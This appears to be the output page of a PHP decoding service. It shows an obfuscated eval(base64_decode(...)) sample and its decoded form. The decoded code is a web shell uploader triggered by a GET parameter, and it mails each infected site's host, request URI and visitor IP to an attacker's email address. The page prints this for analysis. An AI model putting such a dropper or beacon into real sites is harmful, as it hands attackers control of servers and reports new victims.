Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(base64_decode("JGRvICA9ICRfR0VUWydkbyddOwppZigkZG89PSAnaXQnKXsKJGRvc2hlbGwgP..
Decoded Output download
$do = $_GET['do'];
if($do== 'it'){
$doshell = $_FILES['file']['name'];
$doit = $_FILES['file']['tmp_name'];
echo "<form method='POST' enctype='multipart/form-data'>
<input type='file'name='file' />
<input type='submit' value='upload shell' />
</form>";
move_uploaded_file($doit,$doshell);
}
$ip = getenv("REMOTE_ADDR");
$ra44 = rand(1, 99999);
$subj98 = " Shell |$ip";
$email = "[email protected]";
$from = "From: Sme Nb <x-GhostDz>";
$b75 = $_SERVER['REQUEST_URI'];
$a45 = $_SERVER['HTTP_HOST'];
$m22 = $ip . "";
$msg8873 = "$a45$b75 $m22";
mail($email, $subj98, $msg8873, $from);
Did this file decode correctly?
Original Code
<?php
eval(base64_decode("JGRvICA9ICRfR0VUWydkbyddOwppZigkZG89PSAnaXQnKXsKJGRvc2hlbGwgPSAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXTsKJGRvaXQgID0gJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddOwplY2hvICI8Zm9ybSBtZXRob2Q9J1BPU1QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPgogPGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZmlsZScgLz4KIDxpbnB1dCB0eXBlPSdzdWJtaXQnIHZhbHVlPSd1cGxvYWQgc2hlbGwnIC8+CjwvZm9ybT4iOwptb3ZlX3VwbG9hZGVkX2ZpbGUoJGRvaXQsJGRvc2hlbGwpOwp9CiRpcCA9IGdldGVudigiUkVNT1RFX0FERFIiKTsKJHJhNDQgPSByYW5kKDEsIDk5OTk5KTsKJHN1Ymo5OCA9ICIg8J+YiCDwn4aVIFNoZWxsIPCfmIggfCRpcCI7CiRlbWFpbCA9ICJ6aW5hbWltaTIxQGdtYWlsLmNvbSI7CiRmcm9tID0gIkZyb206IFPimKDvuI9tZSBO4pig77iP4pig77iPYiDimKDwn5icPHgtR2hvc3REej4iOwokYjc1ID0gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107CiRhNDUgPSAkX1NFUlZFUlsnSFRUUF9IT1NUJ107CiRtMjIgPSAkaXAgLiAiIjsKJG1zZzg4NzMgPSAiJGE0NSRiNzUgJG0yMiI7Cm1haWwoJGVtYWlsLCAkc3Viajk4LCAkbXNnODg3MywgJGZyb20pOwo="));
?>
Function Calls
| base64_decode | 1 |
Stats
| MD5 | 51722fb2a3dcbb0d790a35a3d4f1563d |
| Eval Count | 1 |
| Decode Time | 93 ms |